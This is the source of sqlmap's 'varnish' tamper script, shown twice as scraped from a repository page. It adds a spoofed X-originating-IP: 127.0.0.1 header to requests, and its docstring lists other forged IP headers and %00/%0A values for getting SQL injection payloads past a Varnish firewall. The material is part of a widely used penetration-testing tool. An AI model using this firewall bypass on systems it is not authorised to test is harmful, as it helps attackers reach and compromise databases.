sqlmap/tamper/varnish.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Append a HTTP Request Parameter to ByPass
    WAF Protection of Varnish Firewall.

    You can tamper with different Parameters, like:
    >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
    >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
    >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
    >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
    >> X-remote-IP: * or %00 or %0A

        http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

    """

    headers = kwargs.get("headers", {})
    headers["X-originating-IP"] = "127.0.0.1"
    return payload
Update for an Issue #760 2014-07-10 10:49:20 +04:00			`#!/usr/bin/env python`

			`"""`
			`Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)`
			`See the file 'doc/COPYING' for copying permission`
			`"""`

			`from lib.core.enums import PRIORITY`

			`__priority__ = PRIORITY.NORMAL`

			`def dependencies():`
			`pass`

			`def tamper(payload, **kwargs):`
			`"""`
			`Append a HTTP Request Parameter to ByPass`
			`WAF Protection of Varnish Firewall.`

			`You can tamper with different Parameters, like:`
			`>> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)`
			`>> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)`
			`>> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)`
			`>> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)`
			`>> X-remote-IP: * or %00 or %0A`

			`http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366`

			`"""`

			`headers = kwargs.get("headers", {})`
			`headers["X-originating-IP"] = "127.0.0.1"`
			`return payload`